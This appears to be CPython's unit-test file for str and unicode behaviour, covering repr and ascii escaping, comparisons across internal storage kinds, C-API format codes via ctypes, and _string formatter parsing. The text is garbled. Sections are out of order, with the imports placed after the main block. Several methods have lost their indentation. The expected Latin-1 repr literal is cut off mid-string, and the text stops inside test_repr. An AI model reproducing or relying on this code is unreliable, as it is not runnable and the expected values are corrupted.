self.assertEqual(("abc" "def"), "abcdef")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
self.assertEqual(("abc" "def" "ghi"), "abcdefghi")
def test_printing(self):
class BitBucket:
def write(self, text):
pass
out = BitBucket()
print('abc', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc', 'def', file=out)
print('abc\n', file=out)
print('abc\n', end=' ', file=out)
print('abc\n', end=' ', file=out)
print('def\n', file=out)
print('def\n', file=out)
    def test_ucs4(self):
        """raw-unicode-escape round-trips non-BMP code points.

        Also verifies that decoding an out-of-range \\U escape raises
        UnicodeDecodeError reporting the full 10-character escape span.
        """
        x = '\U00100000'
        y = x.encode("raw-unicode-escape").decode("raw-unicode-escape")
        self.assertEqual(x, y)
        y = br'\U00100000'
        x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
        self.assertEqual(x, y)
        y = br'\U00010000'
        x = y.decode("raw-unicode-escape").encode("raw-unicode-escape")
        self.assertEqual(x, y)
        try:
            br'\U11111111'.decode("raw-unicode-escape")
        except UnicodeDecodeError as e:
            # the error span must cover the whole escape, chars 0..10
            self.assertEqual(e.start, 0)
            self.assertEqual(e.end, 10)
        else:
            self.fail("Should have raised UnicodeDecodeError")
    def test_conversion(self):
        """str() honours __str__ on plain objects and str subclasses.

        Also checks that str() of a subclass whose __str__ returns self
        preserves the subclass type, and that converting through the
        module-level StrSubclass yields a StrSubclass instance.
        """
        # Make sure __str__() works properly
        class ObjectToStr:
            def __str__(self):
                return "foo"
        class StrSubclassToStr(str):
            def __str__(self):
                return "foo"
        class StrSubclassToStrSubclass(str):
            def __new__(cls, content=""):
                # doubles the content so construction is observable
                return str.__new__(cls, 2*content)
            def __str__(self):
                return self
        self.assertEqual(str(ObjectToStr()), "foo")
        self.assertEqual(str(StrSubclassToStr("bar")), "foo")
        s = str(StrSubclassToStrSubclass("foo"))
        self.assertEqual(s, "foofoo")
        self.assertIs(type(s), StrSubclassToStrSubclass)
        s = StrSubclass(StrSubclassToStrSubclass("foo"))
        self.assertEqual(s, "foofoo")
        self.assertIs(type(s), StrSubclass)
def test_unicode_repr(self):
class s1:
def __repr__(self):
return '\\n'
class s2:
def __repr__(self):
return '\\n'
self.assertEqual(repr(s1()), '\\n')
self.assertEqual(repr(s2()), '\\n')
def test_printable_repr(self):
self.assertEqual(repr('\U00010000'), "'%c'" % (0x10000,)) # printable
self.assertEqual(repr('\U00014000'), "'\\U00014000'") # nonprintable
    # This test only affects 32-bit platforms because expandtabs can only take
    # an int as the max value, not a 64-bit C long.  If expandtabs is changed
    # to take a 64-bit long, this test should apply to all platforms.
    @unittest.skipIf(sys.maxsize > (1 << 32) or struct.calcsize('P') != 4,
                     'only applies to 32-bit platforms')
    def test_expandtabs_overflows_gracefully(self):
        """expandtabs with a huge tab size must raise OverflowError, not crash."""
        self.assertRaises(OverflowError, 't\tt\t'.expandtabs, sys.maxsize)
    @support.cpython_only
    def test_expandtabs_optimization(self):
        """CPython returns the very same object when there is nothing to expand."""
        s = 'abc'
        self.assertIs(s.expandtabs(), s)
    def test_raiseMemError(self):
        """Allocating a near-maximum-length string raises MemoryError cleanly.

        The struct sizes mirror CPython's compact unicode object layouts
        (PEP 393) for 64-bit vs 32-bit pointer platforms; maxlen is chosen
        so the allocation request is astronomically large but well-formed.
        """
        if struct.calcsize('P') == 8:
            # 64 bits pointers
            ascii_struct_size = 48
            compact_struct_size = 72
        else:
            # 32 bits pointers
            ascii_struct_size = 24
            compact_struct_size = 36
        for char in ('a', '\xe9', '\u20ac', '\U0010ffff'):
            code = ord(char)
            if code < 0x100:
                char_size = 1  # sizeof(Py_UCS1)
                struct_size = ascii_struct_size
            elif code < 0x10000:
                char_size = 2  # sizeof(Py_UCS2)
                struct_size = compact_struct_size
            else:
                char_size = 4  # sizeof(Py_UCS4)
                struct_size = compact_struct_size
            # Note: sys.maxsize is half of the actual max allocation because of
            # the signedness of Py_ssize_t. Strings of maxlen-1 should in principle
            # be allocatable, given enough memory.
            maxlen = ((sys.maxsize - struct_size) // char_size)
            alloc = lambda: char * maxlen
            self.assertRaises(MemoryError, alloc)
            self.assertRaises(MemoryError, alloc)
def test_format_subclass(self):
class S(str):
def __str__(self):
return '__str__ overridden'
s = S('xxx')
self.assertEqual("%s" % s, '__str__ overridden')
self.assertEqual("{}".format(s), '__str__ overridden')
def test_subclass_add(self):
class S(str):
def __add__(self, o):
return "3"
self.assertEqual(S("4") + S("5"), "3")
class S(str):
def __iadd__(self, o):
return "3"
s = S("1")
s += "4"
self.assertEqual(s, "3")
def test_getnewargs(self):
text = 'abc'
args = text.__getnewargs__()
self.assertIsNot(args[0], text)
self.assertEqual(args[0], text)
self.assertEqual(len(args), 1)
    def test_resize(self):
        """In-place string resize must invalidate the cached wstr field.

        Encoding with 'unicode_internal' populates the internal wstr
        representation; appending to the (refcount-1) string then triggers
        an in-place resize, after which the wstr must be recomputed.
        """
        for length in range(1, 100, 7):
            # generate a fresh string (refcount=1)
            text = 'a' * length + 'b'
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                # fill wstr internal field
                abc = text.encode('unicode_internal')
                self.assertEqual(abc.decode('unicode_internal'), text)
                # resize text: wstr field must be cleared and then recomputed
                text += 'c'
                abcdef = text.encode('unicode_internal')
                self.assertNotEqual(abc, abcdef)
                self.assertEqual(abcdef.decode('unicode_internal'), text)
    def test_compare(self):
        """Comparison across PEP 393 storage kinds (ASCII/latin/BMP/astral).

        Issue #17615: equality and ordering must be consistent regardless of
        the internal 1/2/4-byte representation of either operand.
        """
        # Issue #17615
        N = 10
        ascii = 'a' * N
        ascii2 = 'z' * N
        latin = '\x80' * N
        latin2 = '\xff' * N
        bmp = '\u0100' * N
        bmp2 = '\uffff' * N
        astral = '\U00100000' * N
        astral2 = '\U0010ffff' * N
        strings = (
            ascii, ascii2,
            latin, latin2,
            bmp, bmp2,
            astral, astral2)
        for text1, text2 in itertools.combinations(strings, 2):
            equal = (text1 is text2)
            self.assertEqual(text1 == text2, equal)
            self.assertEqual(text1 != text2, not equal)
            if equal:
                self.assertTrue(text1 <= text2)
                self.assertTrue(text1 >= text2)
                # text1 is text2: duplicate strings to skip the "str1 == str2"
                # optimization in unicode_compare_eq() and really compare
                # character per character
                copy1 = duplicate_string(text1)
                copy2 = duplicate_string(text2)
                self.assertIsNot(copy1, copy2)
                self.assertTrue(copy1 == copy2)
                self.assertFalse(copy1 != copy2)
                self.assertTrue(copy1 <= copy2)
                self.assertTrue(copy2 >= copy2)
        # full ordering matrix between the four kinds
        self.assertTrue(ascii < ascii2)
        self.assertTrue(ascii < latin)
        self.assertTrue(ascii < bmp)
        self.assertTrue(ascii < astral)
        self.assertFalse(ascii >= ascii2)
        self.assertFalse(ascii >= latin)
        self.assertFalse(ascii >= bmp)
        self.assertFalse(ascii >= astral)
        self.assertFalse(latin < ascii)
        self.assertTrue(latin < latin2)
        self.assertTrue(latin < bmp)
        self.assertTrue(latin < astral)
        self.assertTrue(latin >= ascii)
        self.assertFalse(latin >= latin2)
        self.assertFalse(latin >= bmp)
        self.assertFalse(latin >= astral)
        self.assertFalse(bmp < ascii)
        self.assertFalse(bmp < latin)
        self.assertTrue(bmp < bmp2)
        self.assertTrue(bmp < astral)
        self.assertTrue(bmp >= ascii)
        self.assertTrue(bmp >= latin)
        self.assertFalse(bmp >= bmp2)
        self.assertFalse(bmp >= astral)
        self.assertFalse(astral < ascii)
        self.assertFalse(astral < latin)
        self.assertFalse(astral < bmp2)
        self.assertTrue(astral < astral2)
        self.assertTrue(astral >= ascii)
        self.assertTrue(astral >= latin)
        self.assertTrue(astral >= bmp2)
        self.assertFalse(astral >= astral2)
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, str)
support.check_free_after_iterating(self, reversed, str)
class CAPITest(unittest.TestCase):
    """Tests driving the C-level unicode API through ctypes and _testcapi.

    Exact byte sequences, format codes and argument widths are the substance
    of these tests; each method targets one PyUnicode_* C function.
    """
    # Test PyUnicode_FromFormat()
    def test_from_format(self):
        """Exercise every format code of PyUnicode_FromFormat via ctypes."""
        support.import_module('ctypes')
        from ctypes import (
            pythonapi, py_object, sizeof,
            c_int, c_long, c_longlong, c_ssize_t,
            c_uint, c_ulong, c_ulonglong, c_size_t, c_void_p)
        name = "PyUnicode_FromFormat"
        _PyUnicode_FromFormat = getattr(pythonapi, name)
        _PyUnicode_FromFormat.restype = py_object
        def PyUnicode_FromFormat(format, *args):
            # wrap str args in py_object so ctypes passes PyObject* for %U/%V
            cargs = tuple(
                py_object(arg) if isinstance(arg, str) else arg
                for arg in args)
            return _PyUnicode_FromFormat(format, *cargs)
        def check_format(expected, format, *args):
            text = PyUnicode_FromFormat(format, *args)
            self.assertEqual(expected, text)
        # ascii format, non-ascii argument
        check_format('ascii\x7f=unicode\xe9',
                     b'ascii\x7f=%U', 'unicode\xe9')
        # non-ascii format, ascii argument: ensure that PyUnicode_FromFormatV()
        # raises an error
        self.assertRaisesRegex(ValueError,
            r'^PyUnicode_FromFormatV\(\) expects an ASCII-encoded format '
            'string, got a non-ASCII byte: 0xe9$',
            PyUnicode_FromFormat, b'unicode\xe9=%s', 'ascii')
        # test "%c"
        check_format('\uabcd',
                     b'%c', c_int(0xabcd))
        check_format('\U0010ffff',
                     b'%c', c_int(0x10ffff))
        with self.assertRaises(OverflowError):
            PyUnicode_FromFormat(b'%c', c_int(0x110000))
        # Issue #18183
        check_format('\U00010000\U00100000',
                     b'%c%c', c_int(0x10000), c_int(0x100000))
        # test "%"
        check_format('%',
                     b'%')
        check_format('%',
                     b'%%')
        check_format('%s',
                     b'%%s')
        check_format('[%]',
                     b'[%%]')
        check_format('%abc',
                     b'%%%s', b'abc')
        # truncated string
        check_format('abc',
                     b'%.3s', b'abcdef')
        check_format('abc[\ufffd',
                     b'%.5s', 'abc[\u20ac]'.encode('utf8'))
        check_format("'\\u20acABC'",
                     b'%A', '\u20acABC')
        check_format("'\\u20",
                     b'%.5A', '\u20acABCDEF')
        check_format("'\u20acABC'",
                     b'%R', '\u20acABC')
        check_format("'\u20acA",
                     b'%.3R', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3S', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3U', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3V', '\u20acABCDEF', None)
        check_format('abc[\ufffd',
                     b'%.5V', None, 'abc[\u20ac]'.encode('utf8'))
        # following tests comes from #7330
        # test width modifier and precision modifier with %S
        check_format("repr=  abc",
                     b'repr=%5S', 'abc')
        check_format("repr=ab",
                     b'repr=%.2S', 'abc')
        check_format("repr=   ab",
                     b'repr=%5.2S', 'abc')
        # test width modifier and precision modifier with %R
        check_format("repr=   'abc'",
                     b'repr=%8R', 'abc')
        check_format("repr='ab",
                     b'repr=%.3R', 'abc')
        check_format("repr=  'ab",
                     b'repr=%5.3R', 'abc')
        # test width modifier and precision modifier with %A
        check_format("repr=   'abc'",
                     b'repr=%8A', 'abc')
        check_format("repr='ab",
                     b'repr=%.3A', 'abc')
        check_format("repr=  'ab",
                     b'repr=%5.3A', 'abc')
        # test width modifier and precision modifier with %s
        check_format("repr=  abc",
                     b'repr=%5s', b'abc')
        check_format("repr=ab",
                     b'repr=%.2s', b'abc')
        check_format("repr=   ab",
                     b'repr=%5.2s', b'abc')
        # test width modifier and precision modifier with %U
        check_format("repr=  abc",
                     b'repr=%5U', 'abc')
        check_format("repr=ab",
                     b'repr=%.2U', 'abc')
        check_format("repr=   ab",
                     b'repr=%5.2U', 'abc')
        # test width modifier and precision modifier with %V
        check_format("repr=  abc",
                     b'repr=%5V', 'abc', b'123')
        check_format("repr=ab",
                     b'repr=%.2V', 'abc', b'123')
        check_format("repr=   ab",
                     b'repr=%5.2V', 'abc', b'123')
        check_format("repr=  123",
                     b'repr=%5V', None, b'123')
        check_format("repr=12",
                     b'repr=%.2V', None, b'123')
        check_format("repr=   12",
                     b'repr=%5.2V', None, b'123')
        # test integer formats (%i, %d, %u)
        check_format('010',
                     b'%03i', c_int(10))
        check_format('0010',
                     b'%0.4i', c_int(10))
        check_format('-123',
                     b'%i', c_int(-123))
        check_format('-123',
                     b'%li', c_long(-123))
        check_format('-123',
                     b'%lli', c_longlong(-123))
        check_format('-123',
                     b'%zi', c_ssize_t(-123))
        check_format('-123',
                     b'%d', c_int(-123))
        check_format('-123',
                     b'%ld', c_long(-123))
        check_format('-123',
                     b'%lld', c_longlong(-123))
        check_format('-123',
                     b'%zd', c_ssize_t(-123))
        check_format('123',
                     b'%u', c_uint(123))
        check_format('123',
                     b'%lu', c_ulong(123))
        check_format('123',
                     b'%llu', c_ulonglong(123))
        check_format('123',
                     b'%zu', c_size_t(123))
        # test long output
        min_longlong = -(2 ** (8 * sizeof(c_longlong) - 1))
        max_longlong = -min_longlong - 1
        check_format(str(min_longlong),
                     b'%lld', c_longlong(min_longlong))
        check_format(str(max_longlong),
                     b'%lld', c_longlong(max_longlong))
        max_ulonglong = 2 ** (8 * sizeof(c_ulonglong)) - 1
        check_format(str(max_ulonglong),
                     b'%llu', c_ulonglong(max_ulonglong))
        PyUnicode_FromFormat(b'%p', c_void_p(-1))
        # test padding (width and/or precision)
        check_format('123'.rjust(10, '0'),
                     b'%010i', c_int(123))
        check_format('123'.rjust(100),
                     b'%100i', c_int(123))
        check_format('123'.rjust(100, '0'),
                     b'%.100i', c_int(123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80i', c_int(123))
        check_format('123'.rjust(10, '0'),
                     b'%010u', c_uint(123))
        check_format('123'.rjust(100),
                     b'%100u', c_uint(123))
        check_format('123'.rjust(100, '0'),
                     b'%.100u', c_uint(123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80u', c_uint(123))
        check_format('123'.rjust(10, '0'),
                     b'%010x', c_int(0x123))
        check_format('123'.rjust(100),
                     b'%100x', c_int(0x123))
        check_format('123'.rjust(100, '0'),
                     b'%.100x', c_int(0x123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80x', c_int(0x123))
        # test %A
        check_format(r"%A:'abc\xe9\uabcd\U0010ffff'",
                     b'%%A:%A', 'abc\xe9\uabcd\U0010ffff')
        # test %V
        check_format('repr=abc',
                     b'repr=%V', 'abc', b'xyz')
        # Test string decode from parameter of %s using utf-8.
        # b'\xe4\xba\xba\xe6\xb0\x91' is utf-8 encoded byte sequence of
        # '\u4eba\u6c11'
        check_format('repr=\u4eba\u6c11',
                     b'repr=%V', None, b'\xe4\xba\xba\xe6\xb0\x91')
        #Test replace error handler.
        check_format('repr=abc\ufffd',
                     b'repr=%V', None, b'abc\xff')
        # not supported: copy the raw format string. these tests are just here
        # to check for crashes and should not be considered as specifications
        check_format('%s',
                     b'%1%s', b'abc')
        check_format('%1abc',
                     b'%1abc')
        check_format('%+i',
                     b'%+i', c_int(10))
        check_format('%.%s',
                     b'%.%s', b'abc')
    # Test PyUnicode_AsWideChar()
    @support.cpython_only
    def test_aswidechar(self):
        """PyUnicode_AsWideChar copies into a sized buffer, NUL-terminating
        only when the buffer has room for it."""
        from _testcapi import unicode_aswidechar
        support.import_module('ctypes')
        from ctypes import c_wchar, sizeof
        wchar, size = unicode_aswidechar('abcdef', 2)
        self.assertEqual(size, 2)
        self.assertEqual(wchar, 'ab')
        wchar, size = unicode_aswidechar('abc', 3)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc')
        wchar, size = unicode_aswidechar('abc', 4)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidechar('abc', 10)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidechar('abc\0def', 20)
        self.assertEqual(size, 7)
        self.assertEqual(wchar, 'abc\0def\0')
        # non-BMP char needs a surrogate pair when wchar_t is 16-bit
        nonbmp = chr(0x10ffff)
        if sizeof(c_wchar) == 2:
            buflen = 3
            nchar = 2
        else: # sizeof(c_wchar) == 4
            buflen = 2
            nchar = 1
        wchar, size = unicode_aswidechar(nonbmp, buflen)
        self.assertEqual(size, nchar)
        self.assertEqual(wchar, nonbmp + '\0')
    # Test PyUnicode_AsWideCharString()
    @support.cpython_only
    def test_aswidecharstring(self):
        """PyUnicode_AsWideCharString allocates and NUL-terminates the copy."""
        from _testcapi import unicode_aswidecharstring
        support.import_module('ctypes')
        from ctypes import c_wchar, sizeof
        wchar, size = unicode_aswidecharstring('abc')
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidecharstring('abc\0def')
        self.assertEqual(size, 7)
        self.assertEqual(wchar, 'abc\0def\0')
        # non-BMP char needs a surrogate pair when wchar_t is 16-bit
        nonbmp = chr(0x10ffff)
        if sizeof(c_wchar) == 2:
            nchar = 2
        else: # sizeof(c_wchar) == 4
            nchar = 1
        wchar, size = unicode_aswidecharstring(nonbmp)
        self.assertEqual(size, nchar)
        self.assertEqual(wchar, nonbmp + '\0')
    # Test PyUnicode_AsUCS4()
    @support.cpython_only
    def test_asucs4(self):
        """PyUnicode_AsUCS4 fills a UCS4 buffer, with/without NUL termination,
        and reports SystemError when the buffer is too small."""
        from _testcapi import unicode_asucs4
        for s in ['abc', '\xa1\xa2', '\u4f60\u597d', 'a\U0001f600',
                  'a\ud800b\udfffc', '\ud834\udd1e']:
            l = len(s)
            self.assertEqual(unicode_asucs4(s, l, 1), s+'\0')
            self.assertEqual(unicode_asucs4(s, l, 0), s+'\uffff')
            self.assertEqual(unicode_asucs4(s, l+1, 1), s+'\0\uffff')
            self.assertEqual(unicode_asucs4(s, l+1, 0), s+'\0\uffff')
            self.assertRaises(SystemError, unicode_asucs4, s, l-1, 1)
            self.assertRaises(SystemError, unicode_asucs4, s, l-2, 0)
            s = '\0'.join([s, s])
            self.assertEqual(unicode_asucs4(s, len(s), 1), s+'\0')
            self.assertEqual(unicode_asucs4(s, len(s), 0), s+'\uffff')
    # Test PyUnicode_FindChar()
    @support.cpython_only
    def test_findchar(self):
        """PyUnicode_FindChar: forward/backward search, bounds, negatives."""
        from _testcapi import unicode_findchar
        for str in "\xa1", "\u8000\u8080", "\ud800\udc02", "\U0001f100\U0001f1f1":
            for i, ch in enumerate(str):
                self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), 1), i)
                self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), -1), i)
        str = "!>_<!"
        self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), 1), -1)
        self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), -1), -1)
        # start < end
        self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, 1), 4)
        self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, -1), 4)
        # start >= end
        self.assertEqual(unicode_findchar(str, ord('!'), 0, 0, 1), -1)
        self.assertEqual(unicode_findchar(str, ord('!'), len(str), 0, 1), -1)
        # negative
        self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, 1), 0)
        self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, -1), 0)
    # Test PyUnicode_CopyCharacters()
    @support.cpython_only
    def test_copycharacters(self):
        """PyUnicode_CopyCharacters across same/different storage kinds,
        plus index/size error reporting."""
        from _testcapi import unicode_copycharacters
        strings = [
            'abcde', '\xa1\xa2\xa3\xa4\xa5',
            '\u4f60\u597d\u4e16\u754c\uff01',
            '\U0001f600\U0001f601\U0001f602\U0001f603\U0001f604'
        ]
        for idx, from_ in enumerate(strings):
            # wide -> narrow: exceed maxchar limitation
            for to in strings[:idx]:
                self.assertRaises(
                    SystemError,
                    unicode_copycharacters, to, 0, from_, 0, 5
                )
            # same kind
            for from_start in range(5):
                self.assertEqual(
                    unicode_copycharacters(from_, 0, from_, from_start, 5),
                    (from_[from_start:from_start+5].ljust(5, '\0'),
                     5-from_start)
                )
            for to_start in range(5):
                self.assertEqual(
                    unicode_copycharacters(from_, to_start, from_, to_start, 5),
                    (from_[to_start:to_start+5].rjust(5, '\0'),
                     5-to_start)
                )
        # narrow -> wide
        # Tests omitted since this creates invalid strings.
        s = strings[0]
        self.assertRaises(IndexError, unicode_copycharacters, s, 6, s, 0, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, -1, s, 0, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, 6, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, -1, 5)
        self.assertRaises(SystemError, unicode_copycharacters, s, 1, s, 0, 5)
        self.assertRaises(SystemError, unicode_copycharacters, s, 0, s, 0, -1)
        self.assertRaises(SystemError, unicode_copycharacters, s, 0, b'', 0, 0)
    @support.cpython_only
    def test_encode_decimal(self):
        """PyUnicode_EncodeDecimal maps Unicode digits to ASCII digits."""
        from _testcapi import unicode_encodedecimal
        self.assertEqual(unicode_encodedecimal('123'),
                         b'123')
        self.assertEqual(unicode_encodedecimal('\u0663.\u0661\u0664'),
                         b'3.14')
        self.assertEqual(unicode_encodedecimal("\N{EM SPACE}3.14\N{EN SPACE}"),
                         b' 3.14 ')
        self.assertRaises(UnicodeEncodeError,
                          unicode_encodedecimal, "123\u20ac", "strict")
        self.assertRaisesRegex(
            ValueError,
            "^'decimal' codec can't encode character",
            unicode_encodedecimal, "123\u20ac", "replace")
    @support.cpython_only
    def test_transform_decimal(self):
        """PyUnicode_TransformDecimalToASCII converts only digit characters,
        leaving spaces and non-digits untouched."""
        from _testcapi import unicode_transformdecimaltoascii as transform_decimal
        self.assertEqual(transform_decimal('123'),
                         '123')
        self.assertEqual(transform_decimal('\u0663.\u0661\u0664'),
                         '3.14')
        self.assertEqual(transform_decimal("\N{EM SPACE}3.14\N{EN SPACE}"),
                         "\N{EM SPACE}3.14\N{EN SPACE}")
        self.assertEqual(transform_decimal('123\u20ac'),
                         '123\u20ac')
    @support.cpython_only
    def test_pep393_utf8_caching_bug(self):
        """Issue #25709: in-place resize must not leave a stale UTF-8 cache."""
        # Issue #25709: Problem with string concatenation and utf-8 cache
        from _testcapi import getargs_s_hash
        for k in 0x24, 0xa4, 0x20ac, 0x1f40d:
            s = ''
            for i in range(5):
                # Due to CPython specific optimization the 's' string can be
                # resized in-place.
                s += chr(k)
                # Parsing with the "s#" format code calls indirectly
                # PyUnicode_AsUTF8AndSize() which creates the UTF-8
                # encoded string cached in the Unicode object.
                self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
                # Check that the second call returns the same result
                self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
class StringModuleTest(unittest.TestCase):
    """Tests for the private _string helper module used by str.format."""
    def test_formatter_parser(self):
        """_string.formatter_parser splits a format string into
        (literal, field_name, format_spec, conversion) tuples."""
        def parse(format):
            return list(_string.formatter_parser(format))
        formatter = parse("prefix {2!s}xxx{0:^+10.3f}{obj.attr!s} {z[0]!s:10}")
        self.assertEqual(formatter, [
            ('prefix ', '2', '', 's'),
            ('xxx', '0', '^+10.3f', None),
            ('', 'obj.attr', '', 's'),
            (' ', 'z[0]', '10', 's'),
        ])
        formatter = parse("prefix {} suffix")
        self.assertEqual(formatter, [
            ('prefix ', '', '', None),
            (' suffix', None, None, None),
        ])
        formatter = parse("str")
        self.assertEqual(formatter, [
            ('str', None, None, None),
        ])
        formatter = parse("")
        self.assertEqual(formatter, [])
        formatter = parse("{0}")
        self.assertEqual(formatter, [
            ('', '0', '', None),
        ])
        self.assertRaises(TypeError, _string.formatter_parser, 1)
    def test_formatter_field_name_split(self):
        """_string.formatter_field_name_split yields the head name plus
        (is_attr, key) pairs for each attribute/index access."""
        def split(name):
            items = list(_string.formatter_field_name_split(name))
            items[1] = list(items[1])
            return items
        self.assertEqual(split("obj"), ["obj", []])
        self.assertEqual(split("obj.arg"), ["obj", [(True, 'arg')]])
        self.assertEqual(split("obj[key]"), ["obj", [(False, 'key')]])
        self.assertEqual(split("obj.arg[key1][key2]"), [
            "obj",
            [(True, 'arg'),
             (False, 'key1'),
             (False, 'key2'),
            ]])
        self.assertRaises(TypeError, _string.formatter_field_name_split, 1)
# Standard unittest entry point: discover and run every TestCase above.
if __name__ == "__main__":
    unittest.main()
# NOTE(review): the four lines below were dataset-join residue (table columns:
# avg_line_length 45.465956, max_line_length 120, alphanum_fraction 0.534886,
# plus an empty separator). They are not Python and have been commented out to
# keep the file parseable.
import _string
import codecs
import itertools
import operator
import struct
import string
import sys
import unittest
import warnings
from test import support, string_tests
def search_function(encoding):
    """Codec search hook that serves deliberately malformed codec entries.

    "test.unicode1" resolves to encode/decode callables returning a bare
    int (42) instead of a (result, length) tuple; "test.unicode2" resolves
    to callables returning a 2-tuple of ints.  Both are used elsewhere to
    check that the codec machinery rejects such results with TypeError.
    Any other encoding name is declined by returning None.
    """
    def bad_scalar(input, errors="strict"):
        return 42
    def bad_pair(input, errors="strict"):
        return (42, 42)
    registry = {
        "test.unicode1": (bad_scalar, bad_scalar, None, None),
        "test.unicode2": (bad_pair, bad_pair, None, None),
    }
    return registry.get(encoding)
codecs.register(search_function)
def duplicate_string(text):
    """Return a new string object equal to *text*.

    Round-tripping through UTF-8 forces a fresh allocation, which lets
    identity-sensitive tests compare equal-but-distinct string objects.
    """
    return text.encode("utf-8").decode("utf-8")
class StrSubclass(str):
    """Trivial str subclass; conversion tests check it is preserved by str()."""
    pass
class UnicodeTest(string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
unittest.TestCase):
type2test = str
    def checkequalnofix(self, result, object, methodname, *args):
        """Assert a method call returns *result* with the exact same type.

        If the call returned *object* itself, repeat the call on a str
        subclass wrapper and require a genuinely new object back, so that
        identity short-cuts never leak subclass instances.
        """
        method = getattr(object, methodname)
        realresult = method(*args)
        self.assertEqual(realresult, result)
        self.assertTrue(type(realresult) is type(result))
        # when the method returned its receiver unchanged, re-check through a
        # str subclass: the result must then be a distinct object
        if realresult is object:
            class usub(str):
                def __repr__(self):
                    return 'usub(%r)' % str.__repr__(self)
            object = usub(object)
            method = getattr(object, methodname)
            realresult = method(*args)
            self.assertEqual(realresult, result)
            self.assertTrue(object is not realresult)
    def test_literals(self):
        """String-literal escapes: \\x, \\u, \\U equivalence and limits."""
        self.assertEqual('\xff', '\u00ff')
        self.assertEqual('\uffff', '\U0000ffff')
        # \U escapes above the Unicode range must be rejected at compile time
        self.assertRaises(SyntaxError, eval, '\'\\Ufffffffe\'')
        self.assertRaises(SyntaxError, eval, '\'\\Uffffffff\'')
        self.assertRaises(SyntaxError, eval, '\'\\U%08x\'' % 0x110000)
        # raw strings should not have unicode escapes
        self.assertNotEqual(r"\u0020", " ")
def test_ascii(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(ascii('abc'), "'abc'")
self.assertEqual(ascii('ab\\c'), "'ab\\\\c'")
self.assertEqual(ascii('ab\\'), "'ab\\\\'")
self.assertEqual(ascii('\\c'), "'\\\\c'")
self.assertEqual(ascii('\\'), "'\\\\'")
self.assertEqual(ascii('\n'), "'\\n'")
self.assertEqual(ascii('\r'), "'\\r'")
self.assertEqual(ascii('\t'), "'\\t'")
self.assertEqual(ascii('\b'), "'\\x08'")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'\""), """'\\'"'""")
self.assertEqual(ascii("'"), '''"'"''')
self.assertEqual(ascii('"'), """'"'""")
latin1repr = (
"'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
"\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
"\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
"\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
"\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
"\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
"\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
"\\xfe\\xff'")
testrepr = ascii(''.join(map(chr, range(256))))
self.assertEqual(testrepr, latin1repr)
# Test ascii works on wide unicode escapes without overflow.
self.assertEqual(ascii("\U00010000" * 39 + "\uffff" * 4096),
ascii("\U00010000" * 39 + "\uffff" * 4096))
class WrongRepr:
def __repr__(self):
return b'byte-repr'
self.assertRaises(TypeError, ascii, WrongRepr())
    def test_repr(self):
        """repr() escapes nonprintable chars but keeps printable Latin-1.

        Unlike ascii(), repr() leaves printable characters above \\x7f
        (\\xa1 onward) literal; only the nonprintables \\xa0 (NBSP) and
        \\xad (soft hyphen) stay escaped in the expected literal below.
        """
        if not sys.platform.startswith('java'):
